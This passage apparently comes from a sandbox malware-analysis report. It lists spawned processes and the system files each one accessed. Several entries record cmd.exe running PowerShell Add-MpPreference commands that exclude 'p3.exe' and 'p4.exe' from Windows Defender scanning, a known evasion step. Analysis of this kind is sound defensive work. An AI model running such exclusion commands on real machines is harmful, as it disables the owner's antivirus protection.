C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
2272
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P3.EXE'"
Time lapse
2.589254
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSTEM32\SECHOST.DLL
C:\WINDOWS\SYSTEM32\TQUERY.DLL
C:\WINDOWS\SYSTEM32\MSSHOOKS.DLL
C:\WINDOWS\SYSTEM32\MSCOREE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\SYSTEM32\RPCSS.DLL
C:\WINDOWS\SYSTEM32\CRYPTBASE.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSTEM32\CRYPTSP.DLL
C:\WINDOWS\SYSTEM32\RSAENH.DLL
C:\WINDOWS\SYSTEM32\RPCRTREMOTE.DLL
C:\WINDOWS\SYSTEM32\MSSPRXY.DLL
Process children
3164
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P3.EXE'"
Time lapse
4.239349
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\FYOMWUZS8SQ46UF07U26.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFAA90.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
3188
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P4.EXE'"
Time lapse
4.383156
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
3208
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P4.EXE'"
Time lapse
4.709959
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\NDYVXIRAZ4AR0EDNYDHZ.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFABC8.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
